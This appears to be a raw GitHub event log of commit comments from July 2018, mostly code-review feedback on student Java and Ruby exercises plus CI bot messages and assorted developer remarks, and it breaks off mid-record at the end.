{"id":"8000557384","type":"CommitCommentEvent","actor":{"login":"timothyhsieh"},"repo":{"name":"timothyhsieh/msgu"},"payload":{"comment":{"id":29793479,"position":null,"line":null,"path":null,"commit_id":"3d21f5f026bd65a45405fb086dd3afa3b1f49b0c","created_at":"2018-07-22T17:18:20Z","updated_at":"2018-07-22T17:18:20Z","author_association":"OWNER","body":"Created multidev environment [msgu#pr-1](https://dashboard.pantheon.io/sites/a133f0bb-8664-4ab1-8026-2ca11ca8aa7e#pr-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-1-msgu.pantheonsite.io/)"}},"created_at":"2018-07-22T17:18:20Z"}
{"id":"8000557594","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29793480,"position":null,"line":null,"path":null,"commit_id":"4db48c6dba85f345b61c1154e28d8abc4e6d7e70","created_at":"2018-07-22T17:18:30Z","updated_at":"2018-07-22T17:18:30Z","author_association":"OWNER","body":"http://tests.stockfishchess.org/tests/view/5b54ace30ebc5902bdb834b2\r\nsurprisingly looks good so far\r\n\r\nTry a more general solution here\r\nJust as the above test, this has an effect on ThreatByRook[QUEEN]\r\nbut also on the RookCheck and  SliderOnQueen bonus (it was even \"possible\" to score such bonus from behind !!! For example, White Ra1 Bb7 Black Qa5. No SliderOnQueen should be recorded here, but master was recording two (by a rook move to a8 or b6)\r\n\r\n"}},"created_at":"2018-07-22T17:18:30Z"}
{"id":"8000557722","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29793481,"position":13,"line":13,"path":"src/homeTasks/lesson5/Task1Array.java","commit_id":"b4f60b90c49d854d51ce07ad3b3d3984a37df605","created_at":"2018-07-22T17:18:36Z","updated_at":"2018-07-22T17:18:36Z","author_association":"NONE","body":"не надо делать отступов в первой строчке метода"}},"created_at":"2018-07-22T17:18:36Z"}
{"id":"8000557900","type":"CommitCommentEvent","actor":{"login":"hbo66888"},"repo":{"name":"hbo66888/mytest"},"payload":{"comment":{"id":29793483,"position":null,"line":null,"path":null,"commit_id":"9350f3411ee82d4b6077fc0e598cc255c63dd027","created_at":"2018-07-22T17:18:43Z","updated_at":"2018-07-22T17:18:43Z","author_association":"OWNER","body":"飞刀北师大版\r\n的设计施工"}},"created_at":"2018-07-22T17:18:43Z"}
{"id":"8000558648","type":"CommitCommentEvent","actor":{"login":"coyotte508"},"repo":{"name":"donkeytech/gaia-engine"},"payload":{"comment":{"id":29793484,"position":4,"line":558,"path":"src/engine.ts","commit_id":"e7cf5662eaaea929fb5f2f80dc8b4563d4a2a165","created_at":"2018-07-22T17:19:17Z","updated_at":"2018-07-22T17:19:17Z","author_association":"CONTRIBUTOR","body":"The use case is when someone is on track 4 and gains the corresponding tech tile. Without the check they could advance to last track even if they had no green federation.\r\n\r\nI didn't add a test case though... Shame on me!"}},"created_at":"2018-07-22T17:19:17Z"}
{"id":"8000558964","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29793485,"position":29,"line":29,"path":"src/homeTasks/lesson5/Task1Array.java","commit_id":"b4f60b90c49d854d51ce07ad3b3d3984a37df605","created_at":"2018-07-22T17:19:30Z","updated_at":"2018-07-22T17:19:30Z","author_association":"NONE","body":"не, если с чарами то можно, нельзя в конструктор строку передавать :)"}},"created_at":"2018-07-22T17:19:30Z"}
{"id":"8000559342","type":"CommitCommentEvent","actor":{"login":"Praveen2112"},"repo":{"name":"prestodb/presto"},"payload":{"comment":{"id":29793486,"position":16,"line":720,"path":"presto-main/src/main/java/com/facebook/presto/sql/planner/DomainTranslator.java","commit_id":"055496ef40a05c822fba40970a7ac9d7411842de","created_at":"2018-07-22T17:19:45Z","updated_at":"2018-07-22T17:19:45Z","author_association":"NONE","body":"We have added `Cast` as an exception for it . We can have  `Cast(SymbolReference)` or even `Cast(Cast(SymbolReference))` so we try in a recursive way. Say if `expression` is a instance of FunctionCall or some other implementation we will skip them. So we won't search till the first `SymbolReference` is seen for all the expression type, we will look for it only if it a `Cast` expression "}},"created_at":"2018-07-22T17:19:45Z"}
{"id":"8000560041","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29793489,"position":31,"line":31,"path":"src/homeTasks/lesson5/Task1Array.java","commit_id":"b4f60b90c49d854d51ce07ad3b3d3984a37df605","created_at":"2018-07-22T17:20:13Z","updated_at":"2018-07-22T17:20:13Z","author_association":"NONE","body":"сложно написано все равно, можно было просто сравнить элементы с начала и с конца соотв., по памяти не оптимально сделано"}},"created_at":"2018-07-22T17:20:13Z"}
{"id":"8000560337","type":"CommitCommentEvent","actor":{"login":"jesusp87"},"repo":{"name":"jesusp87/jp-random-tests"},"payload":{"comment":{"id":29793491,"position":21,"line":22,"path":"code-review/steps.js","commit_id":"2b0dfb7e094a7ab2ee9535ee058d7100cf25700c","created_at":"2018-07-22T17:20:24Z","updated_at":"2018-07-22T17:20:24Z","author_association":"OWNER","body":"Check if you are pushing the implementation of dismissRateApp() method.. It's doesn't seems to be in ProfileView.js class."}},"created_at":"2018-07-22T17:20:24Z"}
{"id":"8000560985","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29793492,"position":22,"line":22,"path":"src/homeTasks/lesson5/Task2.java","commit_id":"b4f60b90c49d854d51ce07ad3b3d3984a37df605","created_at":"2018-07-22T17:20:53Z","updated_at":"2018-07-22T17:20:53Z","author_association":"NONE","body":"выносить в отдельную функцию определение числа по арабскому символу"}},"created_at":"2018-07-22T17:20:53Z"}
{"id":"8000561982","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29793494,"position":74,"line":74,"path":"src/homeTasks/lesson5/Task2.java","commit_id":"b4f60b90c49d854d51ce07ad3b3d3984a37df605","created_at":"2018-07-22T17:21:36Z","updated_at":"2018-07-22T17:21:36Z","author_association":"NONE","body":"сразу return result < 1 || result > 3999;"}},"created_at":"2018-07-22T17:21:36Z"}
{"id":"8000562737","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29793495,"position":3,"line":3,"path":"src/homeTasks/lesson6/Dot.java","commit_id":"42426871ff6b35db35a454e766523bce1003fb39","created_at":"2018-07-22T17:22:08Z","updated_at":"2018-07-22T17:22:08Z","author_association":"NONE","body":"в задании написано было Point, внимательно читаем, что там просят"}},"created_at":"2018-07-22T17:22:08Z"}
{"id":"8000573363","type":"CommitCommentEvent","actor":{"login":"jesusp87"},"repo":{"name":"jesusp87/jp-random-tests"},"payload":{"comment":{"id":29793539,"position":4,"line":46,"path":"code-review/ProfileView.js","commit_id":"f0686bb52da88d1bf80536938b94fc97c401a35f","created_at":"2018-07-22T17:29:37Z","updated_at":"2018-07-22T17:29:37Z","author_association":"OWNER","body":"Check this selector.. It's seems is doing click on 'selling' tab, right? "}},"created_at":"2018-07-22T17:29:37Z"}
{"id":"8000573420","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29793540,"position":33,"line":33,"path":"src/by/rost/JD01_4/ArrayCopy.java","commit_id":"d001aaae92ea73c3ec102f6db9233d0813265bbb","created_at":"2018-07-22T17:29:40Z","updated_at":"2018-07-22T17:29:40Z","author_association":"NONE","body":"в один for надо, а то хлипкий код получается, шан в сторону и ошибка"}},"created_at":"2018-07-22T17:29:40Z"}
{"id":"8000573638","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29793542,"position":16,"line":16,"path":"src/by/rost/JD01_4/ArrayRepeatValue.java","commit_id":"d001aaae92ea73c3ec102f6db9233d0813265bbb","created_at":"2018-07-22T17:29:49Z","updated_at":"2018-07-22T17:29:49Z","author_association":"NONE","body":"код не отформатирован"}},"created_at":"2018-07-22T17:29:49Z"}
{"id":"8000573861","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29793543,"position":14,"line":14,"path":"src/by/rost/JD01_4/ArrayRepeatValue.java","commit_id":"d001aaae92ea73c3ec102f6db9233d0813265bbb","created_at":"2018-07-22T17:29:58Z","updated_at":"2018-07-22T17:29:58Z","author_association":"NONE","body":"лишних оступов быть не должно!"}},"created_at":"2018-07-22T17:29:58Z"}
{"id":"8000574006","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29793545,"position":11,"line":11,"path":"src/by/rost/JD01_4/ArrayRepeatValue.java","commit_id":"d001aaae92ea73c3ec102f6db9233d0813265bbb","created_at":"2018-07-22T17:30:05Z","updated_at":"2018-07-22T17:30:05Z","author_association":"NONE","body":"зачем столько отступов делать?"}},"created_at":"2018-07-22T17:30:05Z"}
{"id":"8000574833","type":"CommitCommentEvent","actor":{"login":"evil-at-wow"},"repo":{"name":"cmangos/tbc-db"},"payload":{"comment":{"id":29793551,"position":null,"line":null,"path":null,"commit_id":"106915097925b9527069bd659dd340cdfc9b3d76","created_at":"2018-07-22T17:30:38Z","updated_at":"2018-07-22T17:30:38Z","author_association":"CONTRIBUTOR","body":"FYI: these two updates can't be applied if your MySQL/MariaDB server has the standard max_allowed_packet of 1M. I had to (temporarily) change max_allowed_packet to at least 4M for the InstallFullDB.sh script to work again."}},"created_at":"2018-07-22T17:30:38Z"}
{"id":"8000575311","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29793554,"position":44,"line":44,"path":"src/by/rost/JD01_4/ArrayShift.java","commit_id":"d001aaae92ea73c3ec102f6db9233d0813265bbb","created_at":"2018-07-22T17:30:59Z","updated_at":"2018-07-22T17:30:59Z","author_association":"NONE","body":"не надо столько отступов делать"}},"created_at":"2018-07-22T17:30:59Z"}
{"id":"8000575974","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"TheAssassin/AppImageLauncher"},"payload":{"comment":{"id":29793556,"position":null,"line":null,"path":null,"commit_id":"c3e1b274c65f7ecf31e784cf1664d007dd9ff1a1","created_at":"2018-07-22T17:31:26Z","updated_at":"2018-07-22T17:31:26Z","author_association":"NONE","body":"It is a regression of: https://github.com/AppImage/AppImageKit/pull/823"}},"created_at":"2018-07-22T17:31:26Z"}
{"id":"8000577353","type":"CommitCommentEvent","actor":{"login":"jesusp87"},"repo":{"name":"jesusp87/jp-random-tests"},"payload":{"comment":{"id":29793559,"position":5,"line":47,"path":"code-review/ProfileView.js","commit_id":"f0686bb52da88d1bf80536938b94fc97c401a35f","created_at":"2018-07-22T17:32:31Z","updated_at":"2018-07-22T17:32:31Z","author_association":"OWNER","body":"Check this option, It's the same 'else if' as above, no? "}},"created_at":"2018-07-22T17:32:31Z"}
{"id":"8000577444","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29793560,"position":20,"line":20,"path":"src/by/rost/JD01_4/Linerizer.java","commit_id":"d001aaae92ea73c3ec102f6db9233d0813265bbb","created_at":"2018-07-22T17:32:36Z","updated_at":"2018-07-22T17:32:36Z","author_association":"NONE","body":"не надо передавать размер нового массива, как параметром, можно ерунду передать. Рассчитывать его уже в самой функции"}},"created_at":"2018-07-22T17:32:36Z"}
{"id":"8000577780","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29793561,"position":26,"line":26,"path":"src/by/rost/JD01_4/Linerizer.java","commit_id":"d001aaae92ea73c3ec102f6db9233d0813265bbb","created_at":"2018-07-22T17:32:53Z","updated_at":"2018-07-22T17:32:53Z","author_association":"NONE","body":"не надо создавать этой лишней переменной count"}},"created_at":"2018-07-22T17:32:53Z"}
{"id":"8000577943","type":"CommitCommentEvent","actor":{"login":"SuperDroidBond"},"repo":{"name":"mTresk/android_frameworks_base"},"payload":{"comment":{"id":29793562,"position":null,"line":null,"path":null,"commit_id":"129876cc1543a35f8b8e34df1e68530792a477a9","created_at":"2018-07-22T17:33:00Z","updated_at":"2018-07-22T17:33:00Z","author_association":"NONE","body":"At least change the commit brothers. You guys are not using fucked radius rather using rounded corner things.... "}},"created_at":"2018-07-22T17:33:00Z"}
{"id":"8000577959","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29793564,"position":19,"line":23,"path":"lesson1/triangle.rb","commit_id":"adb0add470a485c72e5fa65ba49613fe5075d81b","created_at":"2018-07-22T17:33:01Z","updated_at":"2018-07-22T17:33:01Z","author_association":"NONE","body":"Тут прямоугольный нужно проверить, а не равнобедренный"}},"created_at":"2018-07-22T17:33:01Z"}
{"id":"8000578218","type":"CommitCommentEvent","actor":{"login":"matthewroccocavallo"},"repo":{"name":"matthewroccocavallo/LaborScreenCapture"},"payload":{"comment":{"id":29793565,"position":24,"line":26,"path":"ScreenCapture56/Form1.cs","commit_id":"8e6adb589c50d49e525b7e12caa48934a6a02cd1","created_at":"2018-07-22T17:33:13Z","updated_at":"2018-07-22T17:33:13Z","author_association":"OWNER","body":"`for(var y = 0; y < 3; y++)` Needs removal"}},"created_at":"2018-07-22T17:33:13Z"}
{"id":"8000578490","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29793567,"position":50,"line":50,"path":"src/by/rost/JD01_5/RomanToArabic.java","commit_id":"d001aaae92ea73c3ec102f6db9233d0813265bbb","created_at":"2018-07-22T17:33:26Z","updated_at":"2018-07-22T17:33:26Z","author_association":"NONE","body":"стараться придерживаться того, чтобы из функции был только один return"}},"created_at":"2018-07-22T17:33:26Z"}
{"id":"8000578813","type":"CommitCommentEvent","actor":{"login":"matthewroccocavallo"},"repo":{"name":"matthewroccocavallo/LaborScreenCapture"},"payload":{"comment":{"id":29793568,"position":36,"line":30,"path":"ScreenCapture56/Form1.cs","commit_id":"8e6adb589c50d49e525b7e12caa48934a6a02cd1","created_at":"2018-07-22T17:33:42Z","updated_at":"2018-07-22T17:33:42Z","author_association":"OWNER","body":"Need to add this functionality to its own method."}},"created_at":"2018-07-22T17:33:42Z"}
{"id":"8000579060","type":"CommitCommentEvent","actor":{"login":"joye-ramone"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29793569,"position":null,"line":null,"path":null,"commit_id":"415bb5b194100b7e4376c192e4a56bb0e5f1ac29","created_at":"2018-07-22T17:33:53Z","updated_at":"2018-07-22T17:33:53Z","author_association":"CONTRIBUTOR","body":"Спсб"}},"created_at":"2018-07-22T17:33:53Z"}
{"id":"8000579458","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29793570,"position":32,"line":32,"path":"src/by/rost/JD01_5/reversString.java","commit_id":"d001aaae92ea73c3ec102f6db9233d0813265bbb","created_at":"2018-07-22T17:34:11Z","updated_at":"2018-07-22T17:34:11Z","author_association":"NONE","body":"не надо брать в скобочки  (reversBuilder.reverse())"}},"created_at":"2018-07-22T17:34:11Z"}
{"id":"8000580131","type":"CommitCommentEvent","actor":{"login":"NeverPire"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29793571,"position":null,"line":null,"path":null,"commit_id":"c20eae508865b286ccb5ea37c3ae0e695f32768b","created_at":"2018-07-22T17:34:41Z","updated_at":"2018-07-22T17:34:41Z","author_association":"CONTRIBUTOR","body":"Dressage et domestication ne correspondent pas. J'avais pensé à domptage qui est plus correct mais n'est pas non plus parfait comme apprivoisement peut l'être.\r\n\r\nDe toute manière, si ça passe en jeu, c'est bon. "}},"created_at":"2018-07-22T17:34:41Z"}
{"id":"8000580491","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29793573,"position":1,"line":1,"path":"src/by/rost/JD01_6/Rectangle.java","commit_id":"d001aaae92ea73c3ec102f6db9233d0813265bbb","created_at":"2018-07-22T17:34:59Z","updated_at":"2018-07-22T17:34:59Z","author_association":"NONE","body":"название пакета не по код конвеншену"}},"created_at":"2018-07-22T17:34:59Z"}
{"id":"8000580514","type":"CommitCommentEvent","actor":{"login":"matthewroccocavallo"},"repo":{"name":"matthewroccocavallo/LaborScreenCapture"},"payload":{"comment":{"id":29793574,"position":65,"line":49,"path":"ScreenCapture56/Form1.cs","commit_id":"8e6adb589c50d49e525b7e12caa48934a6a02cd1","created_at":"2018-07-22T17:35:00Z","updated_at":"2018-07-22T17:35:00Z","author_association":"OWNER","body":"Should be 60000 in the production version"}},"created_at":"2018-07-22T17:35:00Z"}
{"id":"8000580651","type":"CommitCommentEvent","actor":{"login":"timothyhsieh"},"repo":{"name":"timothyhsieh/msgu"},"payload":{"comment":{"id":29793576,"position":null,"line":null,"path":null,"commit_id":"8547b2574e255db14ebeeaab60170f1464b7b6ff","created_at":"2018-07-22T17:35:06Z","updated_at":"2018-07-22T17:35:06Z","author_association":"OWNER","body":"Created multidev environment [msgu#pr-1](https://dashboard.pantheon.io/sites/a133f0bb-8664-4ab1-8026-2ca11ca8aa7e#pr-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-1-msgu.pantheonsite.io/)"}},"created_at":"2018-07-22T17:35:06Z"}
{"id":"8000580672","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29793577,"position":8,"line":8,"path":"src/by/rost/JD01_6/Rectangle.java","commit_id":"d001aaae92ea73c3ec102f6db9233d0813265bbb","created_at":"2018-07-22T17:35:07Z","updated_at":"2018-07-22T17:35:07Z","author_association":"NONE","body":"модификаторы доступа!"}},"created_at":"2018-07-22T17:35:07Z"}
{"id":"8000580927","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"HaxeCheckstyle/haxe-formatter"},"payload":{"comment":{"id":29793578,"position":38,"line":295,"path":"checkstyle.json","commit_id":"926af393bf8f1f7f68b2b88111b4dfb0d97b2b7d","created_at":"2018-07-22T17:35:17Z","updated_at":"2018-07-22T17:35:17Z","author_association":"MEMBER","body":"I've been wondering at what point it no longer makes sense to have the check active. ;)"}},"created_at":"2018-07-22T17:35:17Z"}
{"id":"8000581274","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29793579,"position":40,"line":40,"path":"src/by/rost/JD01_6/Rectangle.java","commit_id":"d001aaae92ea73c3ec102f6db9233d0813265bbb","created_at":"2018-07-22T17:35:34Z","updated_at":"2018-07-22T17:35:34Z","author_association":"NONE","body":"как-то сложно расчет идет, упрощай"}},"created_at":"2018-07-22T17:35:34Z"}
{"id":"8000581512","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29793580,"position":42,"line":42,"path":"src/by/rost/JD01_6/Rectangle.java","commit_id":"d001aaae92ea73c3ec102f6db9233d0813265bbb","created_at":"2018-07-22T17:35:43Z","updated_at":"2018-07-22T17:35:43Z","author_association":"NONE","body":"нет расчета диагонали"}},"created_at":"2018-07-22T17:35:43Z"}
{"id":"8000581781","type":"CommitCommentEvent","actor":{"login":"matthewroccocavallo"},"repo":{"name":"matthewroccocavallo/LaborScreenCapture"},"payload":{"comment":{"id":29793581,"position":74,"line":64,"path":"ScreenCapture56/Form1.cs","commit_id":"8e6adb589c50d49e525b7e12caa48934a6a02cd1","created_at":"2018-07-22T17:35:54Z","updated_at":"2018-07-22T17:35:54Z","author_association":"OWNER","body":"Save location of the directory of screenshots to be saved."}},"created_at":"2018-07-22T17:35:54Z"}
{"id":"8000581839","type":"CommitCommentEvent","actor":{"login":"josephzhao"},"repo":{"name":"jonataswalker/ol-contextmenu"},"payload":{"comment":{"id":29793582,"position":null,"line":null,"path":null,"commit_id":"e978ced88102fef02b179c726d2a9a5d2f33a575","created_at":"2018-07-22T17:35:57Z","updated_at":"2018-07-22T17:35:57Z","author_association":"NONE","body":"Output:                                                                      \r\n  ================                                                             \r\n  Running webpack ...                                                          \r\n                                                                               \r\n  BUILD_DIR /opt/cobas.juturna.ca/cobas_react/releases/20180722113137/build    \r\n  SRC_DIR /opt/cobas.juturna.ca/cobas_react/releases/20180722113137/src        \r\n   ERROR  Failed to compile with 1 errors11:34:31                              \r\n                                                                               \r\n  This dependency was not found:                                               \r\n                                                                               \r\n  * ol/control/control in ./node_modules/ol-contextmenu/dist/ol-contextmenu.j  \r\n  s                                                                            \r\n                                                                               \r\n  To install it, you can run: npm install --save ol/control/control            \r\n                                                 "}},"created_at":"2018-07-22T17:35:57Z"}
{"id":"8000582535","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29793585,"position":1,"line":1,"path":"src/HW4/Homework4Task1.java","commit_id":"74533ae55bb7707b04412278be84588ca9f9b2e7","created_at":"2018-07-22T17:36:28Z","updated_at":"2018-07-22T17:36:28Z","author_association":"NONE","body":"название пакета не по код конвеншену"}},"created_at":"2018-07-22T17:36:28Z"}
{"id":"8000583127","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ruby_basics"},"payload":{"comment":{"id":29793586,"position":2,"line":2,"path":"lesson1/ideal_weight.rb","commit_id":"56e41d4aaf9cd184f01e828e1c395eda3e9cd651","created_at":"2018-07-22T17:36:56Z","updated_at":"2018-07-22T17:36:56Z","author_association":"NONE","body":"Имя у нас не цифра"}},"created_at":"2018-07-22T17:36:56Z"}
{"id":"8000583168","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29793587,"position":20,"line":20,"path":"src/HW4/Homework4Task1.java","commit_id":"74533ae55bb7707b04412278be84588ca9f9b2e7","created_at":"2018-07-22T17:36:57Z","updated_at":"2018-07-22T17:36:57Z","author_association":"NONE","body":"вывод надо делать в мейне, функция должна выполнять одну обязанность"}},"created_at":"2018-07-22T17:36:57Z"}
{"id":"8000583421","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"HaxeCheckstyle/haxe-formatter"},"payload":{"comment":{"id":29793588,"position":15,"line":28,"path":"src/formatter/config/WrapConfig.hx","commit_id":"926af393bf8f1f7f68b2b88111b4dfb0d97b2b7d","created_at":"2018-07-22T17:37:08Z","updated_at":"2018-07-22T17:37:08Z","author_association":"MEMBER","body":"Perhaps it makes sense to have another structure to combine / group these, since they're all array-related."}},"created_at":"2018-07-22T17:37:08Z"}
{"id":"8000583469","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ruby_basics"},"payload":{"comment":{"id":29793589,"position":14,"line":14,"path":"lesson1/discriminant.rb","commit_id":"56e41d4aaf9cd184f01e828e1c395eda3e9cd651","created_at":"2018-07-22T17:37:11Z","updated_at":"2018-07-22T17:37:11Z","author_association":"NONE","body":"Тут индентацию нужно поправть"}},"created_at":"2018-07-22T17:37:11Z"}
{"id":"8000583504","type":"CommitCommentEvent","actor":{"login":"alexnester94"},"repo":{"name":"alexnester94/smartSoftTask"},"payload":{"comment":{"id":29793590,"position":10,"line":10,"path":"src/main/java/ru/nesteria/db/dbFunctions/DBActions.java","commit_id":"0f6264d1d3c0d7c672e2fc25268f68ecb912c995","created_at":"2018-07-22T17:37:12Z","updated_at":"2018-07-22T17:37:12Z","author_association":"OWNER","body":"промежуточный метод. Забыл убрать"}},"created_at":"2018-07-22T17:37:12Z"}
{"id":"8000583519","type":"CommitCommentEvent","actor":{"login":"alexvins"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":29793591,"position":5,"line":15,"path":"AI/VCAI/MapObjectsEvaluator.cpp","commit_id":"21c1f47a7876af6db8947ae8a8827179b02e63a6","created_at":"2018-07-22T17:37:13Z","updated_at":"2018-07-22T17:37:13Z","author_association":"MEMBER","body":"`objectDatabase` default constructor is enough"}},"created_at":"2018-07-22T17:37:13Z"}
{"id":"8000583903","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29793592,"position":17,"line":17,"path":"src/HW4/Homework4Task1.java","commit_id":"74533ae55bb7707b04412278be84588ca9f9b2e7","created_at":"2018-07-22T17:37:30Z","updated_at":"2018-07-22T17:37:30Z","author_association":"NONE","body":"почему здесь два прохода? Для сдвига достаточно один раз пройтись по массиву"}},"created_at":"2018-07-22T17:37:30Z"}
{"id":"8000584643","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29793593,"position":5,"line":5,"path":"src/HW4/Homework4Task2.java","commit_id":"74533ae55bb7707b04412278be84588ca9f9b2e7","created_at":"2018-07-22T17:38:02Z","updated_at":"2018-07-22T17:38:02Z","author_association":"NONE","body":"\r\nделать отступ в одну строку между классом и функцией, а также между функциями"}},"created_at":"2018-07-22T17:38:02Z"}
{"id":"8000584809","type":"CommitCommentEvent","actor":{"login":"alexnester94"},"repo":{"name":"alexnester94/smartSoftTask"},"payload":{"comment":{"id":29793594,"position":6,"line":6,"path":"src/main/java/ru/nesteria/db/dbFunctions/DBActions.java","commit_id":"0f6264d1d3c0d7c672e2fc25268f68ecb912c995","created_at":"2018-07-22T17:38:09Z","updated_at":"2018-07-22T17:38:09Z","author_association":"OWNER","body":"Забыл убрать. Ок"}},"created_at":"2018-07-22T17:38:09Z"}
{"id":"8000584936","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29793595,"position":21,"line":21,"path":"src/HW4/Homework4Task2.java","commit_id":"74533ae55bb7707b04412278be84588ca9f9b2e7","created_at":"2018-07-22T17:38:14Z","updated_at":"2018-07-22T17:38:14Z","author_association":"NONE","body":"код не отформатирован, использовать Ctrl + Alt + L перед коммитом"}},"created_at":"2018-07-22T17:38:14Z"}
{"id":"8000585906","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29793596,"position":14,"line":14,"path":"src/HW4/Homework4Task3.java","commit_id":"74533ae55bb7707b04412278be84588ca9f9b2e7","created_at":"2018-07-22T17:39:03Z","updated_at":"2018-07-22T17:39:03Z","author_association":"NONE","body":"третий параметр лучше самого создавать и возвращать функцией, чем передавать, можно ерунду передать"}},"created_at":"2018-07-22T17:39:03Z"}
{"id":"8000585976","type":"CommitCommentEvent","actor":{"login":"alexvins"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":29793597,"position":17,"line":26,"path":"AI/VCAI/MapObjectsEvaluator.cpp","commit_id":"21c1f47a7876af6db8947ae8a8827179b02e63a6","created_at":"2018-07-22T17:39:07Z","updated_at":"2018-07-22T17:39:07Z","author_association":"MEMBER","body":"Could be shorter:\r\n```\r\nobjectDatabase[CompoundMapObjectID(primaryID, secondaryID)] = handler->getRMGInfo().value;\r\n```"}},"created_at":"2018-07-22T17:39:07Z"}
{"id":"8000586414","type":"CommitCommentEvent","actor":{"login":"Islanna"},"repo":{"name":"Islanna/check"},"payload":{"comment":{"id":29793598,"position":null,"line":null,"path":null,"commit_id":"47d938a2f78620ae7e89074e6b4a4ce1791a4cac","created_at":"2018-07-22T17:39:27Z","updated_at":"2018-07-22T17:39:27Z","author_association":"OWNER","body":"[#5]"}},"created_at":"2018-07-22T17:39:27Z"}
{"id":"8000586530","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29793599,"position":null,"line":null,"path":null,"commit_id":"e2d2505943ff98ffb8a9363793d736cb920f2b7a","created_at":"2018-07-22T17:39:31Z","updated_at":"2018-07-22T17:39:31Z","author_association":"NONE","body":"kiva-non-quad-walls (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2327 of 2327 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e2d2505943ff98ffb8a9363793d736cb920f2b7a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e2d2505943ff98ffb8a9363793d736cb920f2b7a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e2d2505943ff98ffb8a9363793d736cb920f2b7a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage 